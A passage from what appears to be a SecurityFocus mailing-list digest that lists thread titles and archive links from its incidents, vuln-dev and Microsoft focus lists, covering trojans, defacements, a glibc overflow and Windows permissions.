4. Dead thread -- Distributed spam-based DoS in progress (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312422

5. port 17300 probe fingerprint analysis (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312366

6. Kuang2 strikes again, is it just me? (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312277

7. www.nopop.net (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312115

8. Web Defacement (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312088

9. mIRC Trojan Variant - port 445 worm/Trojan (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312086

10. ano@ano.com ftpd dip.t-dialin.net (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312000

11. Incidents list administrivia and introductions... (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/311980

12. Spies on Your PC HDrv (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312181

13. ICMP Destination Unreachable, Administratively Prohibited (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/311955

14. S4T4N1C Web Defacement (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/311952

VII. VULN-DEV RESEARCH LIST SUMMARY


1. Call For Papers Announcement: Black Hat Briefings Amsterdam (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312492

2. VisualBasic auditing2 (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312496

3. VisualBasic auditing (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312507

4. Is this an off-by-one overflow? (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312501

5. [argv] BitchX-353 Vulnerability (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312223

6. A different bash blues (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311992

7. glibc glob_filename() recurse call stack overflow (Re[2]: Bash Blues) (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311991

8. glibc glob_filename() recurse call stack overflow (Re[2]: Bash Blues ) (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311990

9. Windows 2000 Static arp not static (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311931

10. Administrivia: Bash Blues (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311892

11. Bash Blues. (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311863

VIII. MICROSOFT FOCUS LIST SUMMARY


1. Windows2000 QuickLaunch (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312594

2. MS Software Update Service (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312595

3. AW: MS Software Update Service (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312591

4. Restricting CmdExec Rights to Sysadmin (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312598

5. Windows station permissions, remote control programs,lower priviledge accounts (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312551

6. AW: Restricting CmdExec Rights to Sysadmin (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312547

7. [despammed] Defeating password cracking (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312549